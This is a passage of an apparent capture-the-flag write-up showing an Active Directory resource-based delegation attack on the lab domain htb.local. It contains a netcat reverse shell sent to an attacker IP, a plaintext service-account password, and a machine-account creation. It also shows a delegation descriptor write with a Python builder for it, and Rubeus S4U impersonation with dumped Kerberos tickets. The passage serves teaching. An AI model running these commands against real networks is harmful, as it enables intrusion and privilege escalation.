However, the operation we need to do has to be run as nt authority\system, so we upload a couple of extra modules and netcat.exe.

PS C:\Users\Administrator\Documents> upload Invoke-CommandAs.ps1

Info: Uploading Invoke-CommandAs.ps1 to C:\Users\Administrator\Documents\Invoke-CommandAs.ps1

Data: 25480 bytes of 25480 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload Invoke-ScheduledTask.ps1

Info: Uploading Invoke-ScheduledTask.ps1 to C:\Users\Administrator\Documents\Invoke-ScheduledTask.ps1  

Data: 13788 bytes of 13788 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload netcat.exe

Info: Uploading netcat.exe to C:\Users\Administrator\Documents\netcat.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

We import both modules and, using netcat, send ourselves a PowerShell to our host, but as nt authority\system thanks to the AsSystem parameter.

PS C:\Users\Administrator\Documents> Import-Module .\Invoke-CommandAs.ps1
PS C:\Users\Administrator\Documents> Import-Module .\Invoke-ScheduledTask.ps1
PS C:\Users\Administrator\Documents> Invoke-CommandAs -ScriptBlock { C:\Users\Administrator\Documents\netcat.exe -e powershell.exe 10.10.14.10 443 } -AsSystem  
PS C:\Users\Administrator\Documents>

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.17
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>

From this shell we now import the two modules we uploaded earlier.

PS C:\Users\Administrator\Documents> Import-Module .\Powermad.ps1
PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1  
PS C:\Users\Administrator\Documents>

Now we define the credentials of test-svc, the user that holds the privilege.

PS C:\Users\Administrator\Documents> $SecPassword = ConvertTo-SecureString 'T3st-S3v!ce-F0r-Pr0d' -AsPlainText -Force
PS C:\Users\Administrator\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\test-svc', $SecPassword)  
PS C:\Users\Administrator\Documents>

Now we add a new computer account, in this case named attackersystem, with an easy-to-remember password such as 123456. This relies on ms-DS-MachineAccountQuota (10 by default) still allowing test-svc to create machine accounts; if it is 0, an existing account with a known password or an SPN-less user has to be used instead.

PS C:\Users\Administrator\Documents> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Credential $Cred  
[+] Machine account attackersystem added
PS C:\Users\Administrator\Documents>

We follow the steps BloodHound gives in the Help section for GenericAll to build the $SDBytes variable: a security descriptor whose DACL grants full control to the attackersystem computer we created.

PS C:\Users\Administrator\Documents> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid -Credential $Cred | Select -Expand objectsid
PS C:\Users\Administrator\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"  
PS C:\Users\Administrator\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Users\Administrator\Documents> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Users\Administrator\Documents>

Finally we write that descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on the computer WEB, where we hold the privilege.

PS C:\Users\Administrator\Documents> Get-DomainComputer WEB -Credential $Cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Credential $Cred  
PS C:\Users\Administrator\Documents>

This process could also be done from Linux, creating the computer with impacket's addcomputer and configuring the permission on WEB with rbcd.

❯ impacket-addcomputer -computer-name attackersystem$ -computer-pass 123456 htb.local/test-svc:'T3st-S3v!ce-F0r-Pr0d'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Successfully added machine account attackersystem$ with password 123456.

❯ impacket-rbcd -delegate-from attackersystem$ -delegate-to WEB$ -action write htb.local/test-svc:'T3st-S3v!ce-F0r-Pr0d'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem$ can now impersonate users on WEB$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-4266912945-3985045794-2943778634-15101)
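The PowerShell above hands the SDDL string to .NET's RawSecurityDescriptor to obtain the bytes, and impacket-rbcd does the same with its own SD classes. As an added example that is not part of the original writeup, the Python block below builds that self-relative security descriptor by hand (owner BA, one ACCESS_ALLOWED_ACE whose mask 0x000F01FF is what CCDCLCSWRPWPDTLOCRSDRCWDWO expands to) and parses one back into the list of SIDs allowed to delegate, which is the check rbcd prints under "Accounts allowed to act on behalf of other identity". The sample SID is attackersystem$'s as shown in the rbcd output; the resulting bytes are what Set-DomainObject and rbcd write into msDS-AllowedToActOnBehalfOfOtherIdentity.

```python
import struct

# The rights in "CCDCLCSWRPWPDTLOCRSDRCWDWO" add up to full control on a directory object;
# BA (BUILTIN\Administrators) is the owner in "O:BA".
FULL_CONTROL = 0x000F01FF
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID (revision, sub-authority count, 48-bit authority, sub-authorities)."""
    parts = sid.split("-")
    if parts[0].upper() != "S" or len(parts) < 3:
        raise ValueError(f"bad SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, off=0):
    """Binary SID at buf[off:] -> (string form, bytes consumed)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids):
    """Self-relative SECURITY_DESCRIPTOR with owner BA and a DACL holding one
    ACCESS_ALLOWED_ACE (full control) per SID: the bytes written into
    msDS-AllowedToActOnBehalfOfOtherIdentity."""
    aces = b""
    for sid in allowed_sids:
        s = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(s), FULL_CONTROL) + s
    # ACL header: revision 2 (no object-specific ACEs), sbz1, size, ACE count, sbz2
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    header_len = 20                                   # revision, sbz1, control, four offsets
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         header_len, 0, 0, header_len + len(owner))   # owner, group, sacl, dacl
    return header + owner + dacl


def read_rbcd_descriptor(sd):
    """List (SID, access mask) pairs from the DACL: who may delegate to this computer."""
    if len(sd) < 20:
        return []                                     # attribute empty or not a descriptor
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    allowed, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_from_bytes(sd, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size                               # other ACE types are skipped by their size
    return allowed


# attackersystem$'s SID as printed by impacket-rbcd above
ATTACKER_SID = "S-1-5-21-4266912945-3985045794-2943778634-15101"

if __name__ == "__main__":
    sd = build_rbcd_descriptor([ATTACKER_SID])
    print(len(sd), "bytes:", sd.hex())
    print(read_rbcd_descriptor(sd))
```

Reading the attribute back before writing matters in practice: the PowerShell Set-DomainObject and rbcd -action write both replace the whole value, so any account that was already allowed to delegate to WEB disappears unless its SID is included in the new descriptor; rbcd's "Attribute ... is empty" line above confirms there was nothing to preserve here.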

With Rubeus.exe we can convert the password 123456 that we set into its Kerberos keys. Only the rc4_hmac key (the NT hash of the password) is used below; unlike the AES keys it does not depend on the salt shown in the output.

PS C:\Users\Administrator\Documents> .\Rubeus.exe hash /password:123456 /user:attackersystem$ /domain:htb.local  

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123456
[*] Input username             : attackersystem$
[*] Input domain               : htb.local
[*] Salt                       : HTB.LOCALhostattacketsystem.htb.local
[*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4
[*]       aes128_cts_hmac_sha1 : BB8C605808D76972251505B80FE6FDC2
[*]       aes256_cts_hmac_sha1 : 25AE34697F20A4A40AA2568B2E000B9FEAF46DE374C432D4A34D36F1EBC50392
[*]       des_cbc_md5          : 13E576A2D051854A

PS C:\Users\Administrator\Documents>

Using that hash for the attackersystem$ account in the htb.local domain, we try to obtain a ticket impersonating Administrator against the SPN http/web.htb.local, but we get an error.

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:http/web.htb.local /domain:htb.local /ptt  

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIE/jCCBPqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIB
      AqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4ID0zCCA8+gAwIBEqEDAgECooIDwQSCA70ChJzxn2/YgfCI
      TjegtHjwUzzFILuP8PwqhwEwiTchLluMMnw4SbH5IwwQ0dmq81maSaxCRauA68z2x0nZqqjduK/sMdsE
      KR4r4xqbkYAtlRaeXgJGSt0Ilxznnb+40pfLB/bjLQmFGfn4A0S9KlIEbqP2b3Ep9Tlifxc75Xurjccu
      fx1v6GCtgcVfSPtZdB2TILpSG4rPx/wHtmJBE5LK6fpupsK+UL5hL0ASBnnoo+aUbT/xZlc3cP7XpovV
      ibaVNT7jGK04W6XQo9vpNiLOOQH1l93uF/CTbJ0PN6yOVd9jBNoZxcf8DupugBeqmExPlWpF6cii7Tjr
      1H3nnDBlDyRqxN4ChchGPAh9Zk0zHgPN5kbsrqYhsY/qWUroa5erDc5SVuIF6P1CqxouXCPescqH72IN
      ybe4ZBuvpv/xRZRiEySquoImsnEVpRpzu+bMYtHfOc66uKiz9N+teqx7vOD+nMXbk9qGD8jUIibTWdg8
      TAxnwnp47k8C+zKoLiwTjWUi+Pogkj8Uo7taWvmodxohTWE3cH9/RUeay+8YU+RvBBn+QCpxEe5QIpmf
      Gb1CDoZ7MNbc4HtS550wGxulw1f1If9eufmwL5z68dn7xXyy2hUQf4XDRqTdtABDBwh8shYBbG/lEbgZ
      4AIcG2pESETw2SXbwoQDFcD9e6FnrdneY8UZ+eUQDxoZI8ydem6piXXAbFMWQxM+21zJXp+hf2ifwT/S
      LQUTZdtxtOJdxbVwVW+3s9mKSEQpnN3+PuZIiH1tPkHb98cM/beG94YPb8d+xIIGjruoPUsa5/izQ9iY
      FZ11107P5e3QqoWWxyA7AMBXXv3N2pQTISAHQQ44NhkGicybSTXcOe5pZZV4dEpOhxSQfU4StCrIjHCp
      cvhs79c0uS2zTQ/WdEO99r9PoD2n/WEm5Rf+TOVewMFw0Ac5bNX/5e8LBOOm+hb/kTSpA7T2zzqR+qDq
      KBD53aQCjaSrapjQLhxmJTAoKtjHRpQXk1Lhx8+AGD6Jq/osZ0Dq3ROFtmJkFPURlBxR4BitDTIU718d
      hdpHrdGXWw6Cf8PX11ZcSCLEKX7HN6CeRJe+JTn8zs8eKJJKb5ryxU06hBXFY1r+Ts8subO9CkrPon8h
      f3P+AUF7r3z8fJq4qPYfX49fkVxHdPYfD9RdDluGn2Oa/r2PhhkGo1xeLF+Tfg87Tj4nJXlWBG3P6pdD
      i42dcuWPy9mYJrIZhEz659dIhIJ+hiaonvm+5+cA7bKVghk01agwdet0aPhd0W+jgdQwgdGgAwIBAKKB
      yQSBxn2BwzCBwKCBvTCBujCBt6AbMBmgAwIBF6ESBBCEC4iuHAxmnekBkwS3uuo6oQsbCUhUQi5MT0NB
      TKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKMHAwUAQOEAAKURGA8yMDIzMDQyOTAzMTQxMlqm
      ERgPMjAyMzA0MjkxMzE0MTJapxEYDzIwMjMwNTA2MDMxNDEyWqgLGwlIVEIuTE9DQUypHjAcoAMCAQKh
      FTATGwZrcmJ0Z3QbCWh0Yi5sb2NhbA==


[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIFQjCCBT6gAwIBBaEDAgEWooIEXTCCBFlhggRVMIIEUaADAgEFoQsbCUhUQi5MT0NBTKIcMBqgAwIB
      AaETMBEbD2F0dGFja2Vyc3lzdGVtJKOCBB0wggQZoAMCARehAwIBAaKCBAsEggQHxjCHrGk75BLfMhwB
      i2j8R0nBHGsVdhhdlOwmOzmHKOVgKzOZWV0i8XiwENqndAq1HXTlvYB9yMXVLHX05WOOC4AY43Hx9QrQ
      Nhjx71XX4aBoG0ZkkD92NpR0f8+LR0IzOCBKaT+wS6Ie3vXdQSJb/H6I1yTlftUFBIxWD39/nTlaW+sd
      IVSG0CEcyaS+kESRvfwUlAjGKAngpkm+yYchHK0GaZDqSlFouQ+VJHI7hyJNT5pxsR6F5bKDhwPyTnj3
      30ltI102p8k8eHjF9HMV1gH8M8SpetwCNQ5q4k/dY1ojB5o6u2lE2hu+Uv3g7mV9ZmUoI9PT7RQyg+TN
      ME0aiDMOwRb2ppSOJyQ5tGxVSIoJHEoAjt3YTu/VibZc5cLPFOG60jItHWL7AnP2YW6xWJXNxw3LqwDa
      NmZWiceQPykKMSJn2ynce7XotpuAIgfEYfOFVjQn0QGVs759W6klxLAVenfpxaTIvimuscJnap2XrH0N
      QAZ8attbil6941TuA5HG6LdHgnlIopP2MDfERRuz3LACETNHv3EHqvBelAa6YRTNjO0iPAndcLzoXrY0
      B4ax9VwKBIOxFhrbc8xT70GvDYd1zUhkyEexLJ7RN/Ly+33YxyzIxK5fupFiA6hvoVA4yyk7Qvg6vWkH
      ff+LETnQmU8yTRUOAET3Epgn0CEJpI+Dr76I9QQAE8qrEEOtyHMim2e8rfSdFEC7dXst6xjpefoz4viB
      Do/BH5FfiztCnhsWtXdy3yS/Rr2oHf5J0mq+gAkU/suy+w8tbLezApGRxhd4NpYF3gMFWmFcCmSQ4dcV
      fxKS79k4thVZJSK21DMxNWdfnKjElb29/kCBEZClCQ58mArqSxSyNeiejvwF6IjK9W2cfPriuP9iNd2e
      8o47m59oiB8G9gg2yv1vnrZIpzVsHO0Q4n1z5aN+RDpAPz4CSIGWZjC8lYAfkyN/XF+L1cvs2lp05zje
      EH4F7OmBMgD1cDAZ38P4Jzw7TxWMFQzi0qOYyvOTdO6q6H82J55VK4yF26DI72CeqTzr97zrwj63b5Km
      FiOQha5eEsGzSmJnevaHHdYbkU5uYFK7J+HVxyAvhNA6U8rIjX6oeX1WzCeC+bdFOK+Okx9OSWZfKuO6
      G24PFbRVbv99KkBnKoXsK5cas/Ct52gTgP6MznGDEqgyRvH3dJ7hJMyXNC9KF0rDN8wdSWYwC34yWpdE
      MaGFSmP6CUS4P++hCs06QHLUydAE+HjK64R9ZuZ1h1xW+7GylCvS78BHc9cxbcmPNtywjoAzlkSzl/pG
      VcpS4c60/ySGwfHLpAwgkpY26KR6FwrvHhdkHmO/JncoOoNHhOf+bu7JtKEJzzgmCcXOY9+BJKYJS4uj
      gdAwgc2gAwIBAKKBxQSBwn2BvzCBvKCBuTCBtjCBs6AbMBmgAwIBF6ESBBA1WBJo9P8YFQszZ3QSNxpM
      oQsbCUhUQi5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAAChAAClERgPMjAyMzA0
      MjkwMzE0MTJaphEYDzIwMjMwNDI5MTMxNDEyWqcRGA8yMDIzMDUwNjAzMTQxMlqoCxsJSFRCLkxPQ0FM
      qRwwGqADAgEBoRMwERsPYXR0YWNrZXJzeXN0ZW0k

[*] Impersonating user 'administrator' to target SPN 'http/web.htb.local'
[*] Building S4U2proxy request for service: 'http/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88

[X] KRB-ERROR (13) : KDC_ERR_BADOPTION

PS C:\Users\Administrator\Documents>

KDC_ERR_BADOPTION at the S4U2proxy step is the usual response when the user being impersonated is protected from delegation (the "Account is sensitive and cannot be delegated" flag or membership of Protected Users), so we need another user to impersonate. Enumerating in BloodHound we come across a group Operations whose only member is the user lee, which may carry a special privilege.

Trying to create the ticket again, this time impersonating the user lee, a ticket is generated and imported that will let us access web.htb.local.

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:lee /msdsspn:http/web.htb.local /domain:htb.local /ptt  
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIE/jCCBPqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIB
      AqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4ID0zCCA8+gAwIBEqEDAgECooIDwQSCA70Gl8JoNiYSvTeP
      t/cTn/Imt8EBaSKCAEbEYCIQz2SaVVD3a2ZRND1hsnX+j28TqBP/F9kcPaW5bW779Yp1HZ9pi3FeoPNw
      ZwgDk8rMpE8KnZe+/eIu7L1ZSKUwHoTThSGBiard3BxQMSw9Z/TOz7WNjXoj2Ew5nyUC7ePoRgq49wzn
      Sp8X1+Qjb/OBoY083fcvwQ5nCUsvsKcXlSZhkiMSu239yCvB/FluCDc9+4kgA6Ki3AbF+q6g38t5ZqnG
      fRzYmSjxx5+ThCx9QDlfS0WAzmQgbE/u3yr92GhXVSa52sB4Ak30U7ol0G3mnBTuV2vgk8kVbn1FNzvl
      yf44/wkYOgUgPLNpuxNBpOHT+uc0O82Hqh3QFM92n33tm1aelSX2YXmhwMI1CXCF6xHfaSpVuBIojT6r
      gaRCgJ0N215klYQI3PmLqtuTNt7NFmbzVfDTX/QoUcQqngHlSP1RA1LAoz20SGrCH+5FhLd2COGtle8/
      a0gMfBDLimBIbzRhe78zl9xxVMQwecstdZrlyGmGMbiCbTl4OF7KLQS/T0BS/XYi/drOa930ZW5fkLkf
      tNo5p2agqG0W+Tn347b02G3JM62J+vZR4n+lopzU4kPAcqBxyj8JzESv4WO1df0JLVCzZou2/nQjvSbb
      /RUy+HuXlhJR6HJAGWwpaPaK9NNlU5lT0edtEOCOzUcT5Gj3+jvS2xMsLbPOtR1lO+0uxDKFqneogA8P
      uGNBTwM/a1NUeHu3J4mltpVCECQshBby/q1quamv28yMsbOuHAPk+jOXvO8FkqjnxpKOXqihpcEqE3zs
      d1ByCN1sW3ea/9TUfwJFJJl7hA+nu1gDeSECSKxW3GEkuEufBIgEix/gyZ4ZtvP471saPqukHVXiCLht
      7Dfibr0PezscZRLynbBrpdRUGpkKP8N65Hs29US7u9kSZIN6KDgGhynlnn2mO2l96ZlctWrBNlezlHf4
      c4qUHEJDw1nAIc8Bw0dXk905TMwSrbtD0eIYqrt29DMoY02xa9WOpUX72d5E/pRSNsTMJKk621oEwjti
      x0f4UWE7l1P4+GY4SFbO3nV7BtqqUtRTZYza4Y/zN+XEmkE8UIjzrkpaFE01N7RHoqg+x5IFToZcoh1r
      fjx5cbP8cGAvT3oOCpg97CE4d4jtI5755BJIiokQBfw5/Hp5PxVorjKqKeIEtdaHiJUxPAgRfEIvoB/q
      UJFXVf80x+QboYtUSu6vSyr3ySQEt1ww4UWpLjHjTnStcVHb+0y7aaHxnys3viejgdQwgdGgAwIBAKKB
      yQSBxn2BwzCBwKCBvTCBujCBt6AbMBmgAwIBF6ESBBAQLlkk2vkz97fQC58UL3+MoQsbCUhUQi5MT0NB
      TKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKMHAwUAQOEAAKURGA8yMDIzMDQyOTAyNDExMFqm
      ERgPMjAyMzA0MjkxMjQxMTBapxEYDzIwMjMwNTA2MDI0MTEwWqgLGwlIVEIuTE9DQUypHjAcoAMCAQKh
      FTATGwZrcmJ0Z3QbCWh0Yi5sb2NhbA==


[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Got a TGS for 'lee' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIEpjCCBKKgAwIBBaEDAgEWooIDyzCCA8dhggPDMIIDv6ADAgEFoQsbCUhUQi5MT0NBTKIcMBqgAwIB
      AaETMBEbD2F0dGFja2Vyc3lzdGVtJKOCA4swggOHoAMCARehAwIBAaKCA3kEggN1KW70YRAVBOg2kIsE
      MD8n+CWeqpjfuqbYP2h1dm4dX53vGuXOlC+Q2aKR/UefKRIE3VSm916SJVK/4CYceatJVpbZKWGcB4Bm
      SJLFypDvm+lCTN16eRW/VEcdmRoHPive9jiU6q3eo6QNI/JiwGCxtGViMt/efW3ydD5DdYTa9xh5joKf
      2MOndmp73F5kq0xk47HmwfTmTg/mlLSBhG0/7d/QTefgd5jiRoepXpcdPEJ6HroHvgLugPIG7Q30TNm5
      /trhYkc+7hDccFBupyvAdehcE3JRTYDgbzO5GZUZqsmVtJQEcAQ+8CoYsOdAGUEt9zqQTDG2lKOa1TLk
      AkKwV7wBYbqYiUPop7/QmIkX5/OBKkAp2U6t2+2JH74xoK3WSQt2cvORrWGmljQVhPQ6MyLcMDMUgZ2/
      Bu1MV8Bpj0qEi+6fRc3Ny6y8D1WCngzGjIbBjkarnd8B0GeIVmDL1mq0Q5AULyid06MvosQb34FIUBYU
      o7McPp18zFkFolS/RQNw6XVhLbvHLLYrQCUA6z8TfUKOu3c4yA9ecK3Nqn+wFK1+l0LreliWsBf5FL/Y
      C7NaKWubtRDDyDVRIA7f2CSBLP79b4oWVPntAqpr9CVM4oe4bS+6b9jxwF1SGXUZE0Lqm9+KA08RiH3s
      tDG2WReuKR6n21a/0k10yDYDOf3nciv0M8MZd3GpKjpMByph7lp7VGayy+Fjne2oxHZuC5+uaBuJiQ+m
      Y2mB6ccW0irHoGwoEO3ovub4LlL90R0641aCtWJ3qNZSjBmCjbhiMCdKzo9oYcAdTA++B7jLOIpJySJk
      3B8iLSXfH8o1LmE1cyCZI50fAyChYVvAQ9JaNAjG7r9AIdUaPbSCjshwc2nwKyCJMBGREyCMwJz6qUJx
      X/dLLvRgs3MQG8aRSde/gHeuGapk2Ag44KhbkLnJ5cMt8aae3NFsdvNiyCB0GaoUucXof0QoKIBS8XP2
      xPHqe9uuxD9TeX037Vgz9Fs0Y7L+Uqm64vUsk9f+2kgl2yN31dRlgHADCuKQ85X70XE/8YZvu/zTrorF
      xQYZUQA5sl2PyxDor6Mhx/Otv2tUVPR7HHk5/ZwBy9cXvPG4mhY6pI4ALlIaPKnLSp5cCKCEZq5RY/V/
      35O9t3g6n0IQRUsTACk6TuWiR6A9DaQspqFESe35jVnno4HGMIHDoAMCAQCigbsEgbh9gbUwgbKgga8w
      gawwgamgGzAZoAMCARehEgQQYDTbN6b1VNBxmveWBs3KAaELGwlIVEIuTE9DQUyiEDAOoAMCAQqhBzAF
      GwNsZWWjBwMFAAChAAClERgPMjAyMzA0MjkwMjQxMTBaphEYDzIwMjMwNDI5MTI0MTEwWqcRGA8yMDIz
      MDUwNjAyNDExMFqoCxsJSFRCLkxPQ0FMqRwwGqADAgEBoRMwERsPYXR0YWNrZXJzeXN0ZW0k

[*] Impersonating user 'lee' to target SPN 'http/web.htb.local'
[*] Building S4U2proxy request for service: 'http/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/web.htb.local':

      doIFWjCCBVagAwIBBaEDAgEWooIEezCCBHdhggRzMIIEb6ADAgEFoQsbCUhUQi5MT0NBTKIgMB6gAwIB
      AqEXMBUbBGh0dHAbDXdlYi5odGIubG9jYWyjggQ3MIIEM6ADAgESoQMCAQmiggQlBIIEIX1Q3yZ6k49P
      Tkk0jwxgepK5+bay2wgBWgBzTEtqVvgRqYmPnundz4SyT2EGGwb/O/eLXulnazIFUvhSgMWNakHnW2FM
      RJB/zAcdI24hYf0pA6p4dbzECn0hZbyd0JWfLwZwUjaR4a9lpWlLCwF+OEmm/vGEXzk9p/MtgB9U+jr0
      vPjyS8CoHNe9jzI0ZXb3xm0OngEzwm2WI+LnkbMEtSoWT1M0oG19MDPXcvMpR+k2wDiMSh/JoNC4Bh58
      1zZ1QlrmZwYp1ncsDUjjwdrZB/fNrSJTvXSdUe4TqvwFTN1ycmrnQo+GfaR2PCCCxo6G+QnNNc2lz6e6
      v/Xy0PbQeDfQMPPzASxUUhSDG5J6nhj5Z9BWdG0HFRxy7w9UT/ZupxhNkl3RmZPScRiiGkkYRal6t5Bm
      6oB0rLYcV81CYP/QHFMXE1kiksHEAYcXBQ2bmVY6wnqlMxU06lCMslh4yCY3G0vLdMZ5ZuUGT6Zdinq7
      dGnzBobG4VtXVvEE4AikgwzrL1RjcPxbUKYnhZlu7QXpPZty178kprN8UL+J9pXnH2QTLYwEB6Qiofsk
      V24h+gEFtYMyEVCgbTrkJfV5Y52m+2g8Es4m8vqXjJPbspNrmpzzNnVVDGrc0/I8BG1pH1cUeBLs7ToL
      Upfrrf3Q/NRyIl2inlVbdJa67noQcvv+lUZKEyoVsV+T0TmOX+UV5OPX9ujy0+sjAjVJI4mttrHse2Xe
      BHKwKNv4Sa5EBzZyK3L+t474SdA3bSOvcRvxCmtsLPlTH0xOGnsZtpNCvZrtVGxF/uKrdf8xFF1NxjZA
      RHWIiq/olNv6i6flfddlZd6ZJaIZEnvTmJCy84eGWfdrGaI3Ls0L/wxeZBoe+VccxsGesaqMgg+hUyoQ
      u/7W8z5OnnkGsfrDJKWtuOFUBbvyGcail08Ior4m1tjaijJtDrJssZGBBFPpNcrwCzx4WShBiN55q8m6
      FytVUewGCZ8UH40dP7SXglYVvTjn+8ms3YmAhC1fDOdvaLLQNbQRetjM7zqy7s+5dHI/VSsr/X7qhZ+y
      qNki5iBXq7x213m/fUygpGr5ZYP8DDun9g2mjvTVEfZFCDMpoTMZa7yHey0VVQ2ZqVfo/HZ3n8zKscEh
      2bZyuelLhzaNKuOZSQ3vYSvRUdxpW9ktcJNYRLsHsuviy39QJZe2sUg7PeI/1i7+wGp11KgbATJGP+zI
      WpoCYfaM753nY6AqT9fHb/zeULpz1QYCaqH95KwuaFbg+iyP+DyW5HonK1V5n/PTsr8YVSE+2le2Suo6
      vADTfU9MdOfy3jsA/lBaTsanI4PH/aLjpUg6rjj9vpyx09wzoE+BCyMmGUPHi9rbgj2pMtLfW2t+7/9r
      sn6XUfPMJePjcwPtdnFUZxOYR2TjphcBsPXOx+WjgcowgcegAwIBAKKBvwSBvH2BuTCBtqCBszCBsDCB
      raAbMBmgAwIBEaESBBBmVAONy74l2UlQd+yjzrU1oQsbCUhUQi5MT0NBTKIQMA6gAwIBCqEHMAUbA2xl
      ZaMHAwUAQKEAAKURGA8yMDIzMDQyOTAyNDExMFqmERgPMjAyMzA0MjkxMjQxMTBapxEYDzIwMjMwNTA2
      MDI0MTEwWqgLGwlIVEIuTE9DQUypIDAeoAMCAQKhFzAVGwRodHRwGw13ZWIuaHRiLmxvY2Fs

[+] Ticket successfully imported!

PS C:\Users\Administrator\Documents> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>	Client: lee @ HTB.LOCAL
	Server: http/web.htb.local @ HTB.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize  
	Start Time: 4/28/2023 19:56:12 (local)
	End Time:   4/29/2023 5:56:11 (local)
